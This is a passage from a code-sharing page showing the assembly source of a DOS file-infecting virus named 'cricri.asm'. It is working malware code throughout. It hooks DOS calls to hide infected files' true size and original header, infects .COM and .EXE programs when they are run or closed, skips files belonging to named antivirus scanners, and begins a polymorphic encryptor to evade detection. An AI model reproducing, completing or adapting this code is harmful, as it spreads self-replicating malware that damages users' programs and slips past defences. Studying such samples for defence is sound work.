📄 cricri.asm
字号:
mov ah,1Fh
and al,ah
cmp al,ah
jne no_get_time
call pop_all
and cl,0E0h
jmp short exit_get_time
no_get_time:
call pop_all
exit_get_time:
call unhook_ints
stc
cmc
retf 2
;----------------------------------------------------------------------------
;Set file date/time
;----------------------------------------------------------------------------
dos_set_time:
call pop_all
call push_all
;Get address of sft entry
call get_sft
jc no_set_time
;Check if file is already infected
mov al,byte ptr es:[di+0Dh]
mov ah,1Fh
and al,ah
cmp al,ah
je ok_set_time
no_set_time:
;Exit if not infected or error
jmp m21h_exit
ok_set_time:
;Perform time change but restore our marker
call pop_all
or cl,1Fh
call push_all
jmp m21h_exit
;----------------------------------------------------------------------------
;Open file
;----------------------------------------------------------------------------
dos_open:
;Call dos function
call pop_all
int 03h
jnc do_open
open_fail:
call unhook_ints
stc
retf 2
do_open:
call push_all
;Get sft for file handle
xchg bx,ax
call get_sft
jc no_changes
;Check if file is infected
mov al,byte ptr es:[di+0Dh]
mov ah,1Fh
and al,ah
cmp al,ah
jne no_changes
;If infected stealth true size
sub word ptr es:[di+11h],lenvir
sbb word ptr es:[di+13h],0000h
no_changes:
call unhook_ints
call pop_all
stc
cmc
retf 2
;----------------------------------------------------------------------------
;Read file
;----------------------------------------------------------------------------
dos_read:
;Restore function entry regs
call pop_all
call push_all
;Duplicate handle
mov ah,45h
int 03h
jc no_read_stealth
xchg bx,ax
push ax
;Close new handle in order to update directory entry
mov ah,3Eh
int 03h
pop bx
;Get address of sft entry
call get_sft
jc no_read_stealth
;Check if file is already infected
mov al,byte ptr es:[di+0Dh]
mov ah,1Fh
and al,ah
cmp al,ah
jne no_read_stealth
;Check and save current offset in file
mov ax,word ptr es:[di+15h]
cmp ax,0019h
jae no_read_stealth
cmp word ptr es:[di+17h],0000h
jne no_read_stealth
mov word ptr cs:[file_offset],ax
call pop_all
;Save address of read buffer
mov word ptr cs:[read_off],dx
mov word ptr cs:[read_seg],ds
;Perform read operation
int 03h
jnc check_read
;Error during file read
call unhook_ints
stc
retf 2
no_read_stealth:
;Exit if no read stealth
jmp m21h_exit
check_read:
call push_all
call get_sft
;Save offset position
push word ptr es:[di+15h]
push word ptr es:[di+17h]
;Save file size
push word ptr es:[di+11h]
push word ptr es:[di+13h]
;Add virus size to file size
add word ptr es:[di+11h],lenvir
adc word ptr es:[di+13h],0000h
;Point to old header in file
call seek_end
sub word ptr es:[di+15h],0019h+01h
sbb word ptr es:[di+17h],0000h
;Read old header and encryption key
push cs
pop ds
mov ah,3Fh
mov cx,0019h+01h
mov dx,offset virus_copy
int 03h
jc exit_read
;Decrypt header
mov cx,0019h
push dx
pop si
mov al,byte ptr cs:[si+19h]
decrypt_header:
xor byte ptr cs:[si+00h],al
inc si
loop decrypt_header
;Move old header into read buffer
les di,dword ptr cs:[read_ptr]
mov si,offset virus_copy
mov cx,0019h-01h
mov ax,word ptr cs:[file_offset]
add di,ax
add si,ax
sub cx,ax
cld
rep movsb
exit_read:
call get_sft
;Restore file size
pop word ptr es:[di+13h]
pop word ptr es:[di+11h]
;Restore old offset in file
pop word ptr es:[di+17h]
pop word ptr es:[di+15h]
;Restore regs and exit
call unhook_ints
call pop_all
stc
cmc
retf 2
;----------------------------------------------------------------------------
;Infect file at execution ds:dx ptr to filename
;----------------------------------------------------------------------------
dos_exec:
;Open file for read-only
mov ax,3D00h
int 03h
jnc ok_file_open
jmp file_error
ok_file_open:
xchg bx,ax
jmp short from_open
;----------------------------------------------------------------------------
;Infect file at close
;----------------------------------------------------------------------------
dos_close:
call pop_all
call push_all
;Duplicate handle
mov ah,45h
int 03h
jc file_error
xchg bx,ax
push ax
;Close new handle in order to update directory entry
mov ah,3Eh
int 03h
pop bx
from_open:
;Get sft address in es:di
call get_sft
jc file_error
;Check device info word
mov ax,word ptr es:[di+05h]
;Check if character device handle
test al,80h
jnz file_error
;Check if remote file handle
test ah,0Fh
jnz file_error
;Check if file is already infected
mov al,byte ptr es:[di+0Dh]
mov ah,1Fh
and al,ah
cmp al,ah
je file_error
;Do not infect files with todays date
mov al,byte ptr es:[di+0Fh]
and al,1Fh
cmp al,byte ptr cs:[today]
je file_error
;Check file name in sft
mov cx,0Bh
mov si,di
name_loop:
;Do not infect files with numbers in their file name
cmp byte ptr es:[si+20h],"0"
jb file_name1
cmp byte ptr es:[si+20h],"9"
jbe file_error
file_name1:
;Do not infect files witch name contains v's
cmp byte ptr es:[si+20h],"V"
je file_error
;Do not infect files with mo in their name
inc si
loop name_loop
;Get first pair
mov ax,word ptr es:[di+20h]
;Do not infect Thunderbyte antivirus utils
cmp ax,"BT"
je file_error
;Do not infect McAfee's Scan
cmp ax,"CS"
je file_error
;Do not infect F-Prot scanner
cmp ax,"-F"
je file_error
;Do not infect Solomon's Guard
cmp ax,"UG"
jne file_infection
file_error:
jmp m21h_exit
file_infection:
;Save and set file open mode (read/write)
mov cx,0002h
xchg cx,word ptr es:[di+02h]
push cx
;Save and set file attribute
xor al,al
xchg al,byte ptr es:[di+04h]
push ax
test al,04h
jnz system_file
;Save and set file pointer position
push word ptr es:[di+15h]
push word ptr es:[di+17h]
call seek_begin
;Read first 20h bytes
push cs
pop ds
mov ah,3Fh
mov cx,0020h
mov dx,offset file_buffer
int 03h
;Seek to end of file and get file size
call seek_end
;Do not infect too small .exe or .com files
or dx,dx
jnz ok_min_size
cmp ax,lenvir+0410h
jbe exit_inf
ok_min_size:
;Check for .com extension
cmp word ptr es:[di+28h],"OC"
jne no_com
cmp byte ptr es:[di+2Ah],"M"
je inf_com
no_com:
;Check for .exe mark in file header
mov cx,word ptr cs:[file_buffer+00h]
;Add markers M+Z
add cl,ch
cmp cl,"Z"+"M"
jne exit_inf
;Check for .exe extension
cmp word ptr es:[di+28h],"XE"
jne exit_inf
cmp byte ptr es:[di+2Ah],"E"
jne exit_inf
jmp inf_exe
;----------------------------------------------------------------------------
;Exit from file infection
;----------------------------------------------------------------------------
exit_inf:
;Restore file pointer position
pop word ptr es:[di+17h]
pop word ptr es:[di+15h]
system_file:
;Restore file attribute
pop ax
mov byte ptr es:[di+04h],al
;Restore file open mode
pop word ptr es:[di+02h]
;Do not set file date/time on closing
or byte ptr es:[di+06h],40h
;Check if close function
cmp byte ptr cs:[dos_function+01h],(3Eh xor 0FFh)
je no_close_file
;Close file
mov ah,3Eh
int 03h
no_close_file:
jmp m21h_exit
;----------------------------------------------------------------------------
;Infect .COM file
;----------------------------------------------------------------------------
inf_com:
;Don't infect too big .com files
cmp ax,0FFFFh-(lenvir+10h)
jae exit_inf
;Copy header
call copy_header
;Get file length as entry point
sub ax,03h
;Write a jump to virus into header
mov byte ptr cs:[file_buffer+00h],0E9h
mov word ptr cs:[file_buffer+01h],ax
;Set .com marker
mov byte ptr cs:[prog_type],"C"
;Encrypt and infect
jmp get_control
;----------------------------------------------------------------------------
;Infect .EXE file
;----------------------------------------------------------------------------
inf_exe:
;Don't infect Windows programs
cmp word ptr cs:[file_buffer+18h],0040h
jae bad_exe
;Don't infect overlays
cmp word ptr cs:[file_buffer+1Ah],0000h
jne bad_exe
;Check maxmem field
cmp word ptr cs:[file_buffer+0Ch],0FFFFh
jne bad_exe
;Save file size
push ax
push dx
;Page ends on 0200h boundary
mov cx,0200h
div cx
or dx,dx
jz no_round_1
inc ax
no_round_1:
cmp ax,word ptr cs:[file_buffer+04h]
jne no_fit_size
cmp dx,word ptr cs:[file_buffer+02h]
je header_ok
no_fit_size:
pop dx
pop ax
bad_exe:
;Exit if cant infect .exe
jmp exit_inf
header_ok:
call copy_header
pop dx
pop ax
push ax
push dx
mov cx,10h
div cx
sub ax,word ptr cs:[file_buffer+08h]
;Store new entry point
mov word ptr cs:[file_buffer+14h],dx
mov word ptr cs:[file_buffer+16h],ax
;Store new stack position
add dx,lenvir+0410h
and dx,0FFFEh
inc ax
mov word ptr cs:[file_buffer+0Eh],ax
mov word ptr cs:[file_buffer+10h],dx
;Restore size
pop dx
pop ax
;Add virus size to file size
add ax,lenvir
adc dx,0000h
;Page ends on 0200h boundary
mov cx,0200h
div cx
or dx,dx
jz no_round_2
inc ax
no_round_2:
;Store new size
mov word ptr cs:[file_buffer+04h],ax
mov word ptr cs:[file_buffer+02h],dx
;Set .exe marker
mov byte ptr cs:[prog_type],"E"
;Encryption an infection continues on next routine
;----------------------------------------------------------------------------
;Encryption and physical infection
;----------------------------------------------------------------------------
get_control:
call do_encrypt
;Write virus body to the end of file
mov ah,40h
mov cx,lenvir
mov dx,offset virus_copy
int 03h
jc no_good_write
;Seek to beginning of file
call seek_begin
;Write new header
mov ah,40h
mov cx,0019h-01h
mov dx,offset file_buffer
int 03h
;Mark file as infected
or byte ptr es:[di+0Dh],1Fh
no_good_write:
;Jump to infection end
jmp exit_inf
;----------------------------------------------------------------------------
;Encrypt virus body with variable key and generate a
;polymorphic decryptor.
;----------------------------------------------------------------------------
do_encrypt:
call push_all
;Initialize engine
xor ax,ax
mov word ptr cs:[last_subroutine],ax
mov word ptr cs:[decrypt_sub],ax
mov word ptr cs:[last_fill_type],ax
dec ax
mov word ptr cs:[last_step_type],ax
mov byte ptr cs:[last_int_type],al
mov byte ptr cs:[decrypt_pointer],al
;Choose counter and pointer register
call get_rnd
and al,01h
mov byte ptr cs:[address_register],al
;Choose register for decryption instructions
⌨️ 快捷键说明
复制代码
Ctrl + C
搜索代码
Ctrl + F
全屏模式
F11
切换主题
Ctrl + Shift + D
显示快捷键
?
增大字号
Ctrl + =
减小字号
Ctrl + -